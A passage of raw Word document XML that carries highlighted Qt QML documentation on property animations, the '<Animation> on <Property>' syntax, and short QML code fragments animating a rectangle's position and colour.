          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Infinite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easing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type</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Easing</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OutBack</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overshoot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500</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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3F18">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Specialized property animation types</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> have </w:t>
      </w:r>
      <w:r w:rsidRPr="00183F18">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">more </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0658">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>efficient implementations</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> than the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2463" w:anchor="propertyanimation" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type. They are for setting animations to different QML types such as</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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color</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and rotations. Similarly, the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2464" w:history="1">
        <w:r w:rsidRPr="0081305D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParentAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can animate parent changes.</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See the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2465" w:anchor="qml-controlling-animations" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Controlling Animations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section for more information about the different animation properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="00AA0658">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2096" w:name="using-predefined-targets-and-properties"/>
      <w:bookmarkStart w:id="2097" w:name="_Toc483000984"/>
      <w:bookmarkStart w:id="2098" w:name="_Toc483003975"/>
      <w:bookmarkStart w:id="2099" w:name="_Toc483604326"/>
      <w:bookmarkStart w:id="2100" w:name="_Toc483605546"/>
      <w:bookmarkEnd w:id="2096"/>
      <w:r w:rsidRPr="00AA0658">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using Predefined Targets and Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2097"/>
      <w:bookmarkEnd w:id="2098"/>
      <w:bookmarkEnd w:id="2099"/>
      <w:bookmarkEnd w:id="2100"/>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In the previous example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2466" w:anchor="propertyanimation" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2467" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NumberAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects needed to specify particular</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2468" w:anchor="target-prop" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>target</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2469" w:anchor="properties-prop" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>properties</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values to specify the objects and properties that should be animated. This can be avoided by using the</w:t>
      </w:r>
      <w:r w:rsidR="009D50DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Animation&gt; on &lt;Property&gt;</w:t>
      </w:r>
      <w:r w:rsidR="009D50DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which specifies the </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animation is to be applied as a</w:t>
      </w:r>
      <w:r w:rsidR="005A2BD2" w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property value source</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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Below are two</w:t>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2470" w:anchor="propertyanimation" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects that are specified using this syntax:</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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rect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width</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height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color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"red"</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PropertyAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on x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to</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PropertyAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y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to</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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The animation starts as soon as the rectangle is loaded, and will automatically be applied to its</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x</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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y</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values. Since the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Animation&gt; on &lt;Property&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">syntax has been used, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>necessary</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2471" w:anchor="target-prop" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>target</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value of the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2472" w:anchor="propertyanimation" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects to</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rect</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>neither is it necessary</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set the</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2473" w:anchor="property-prop" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values to</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x</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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y</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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 xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> also be </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>used by</w:t>
      </w:r>
      <w:r w:rsidR="005A2BD2" w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2474" w:anchor="playing-animations-in-parallel-or-in-sequence" w:history="1">
        <w:r w:rsidRPr="005A2BD2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>grouped animations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="009D50DC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ensure that all animations within a group are applied to the same property</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="009D50DC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the previous example could instead use</w:t>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2475" w:history="1">
        <w:r w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SequentialAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to animate the rectangle's</w:t>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>first to yellow, then to blue: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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
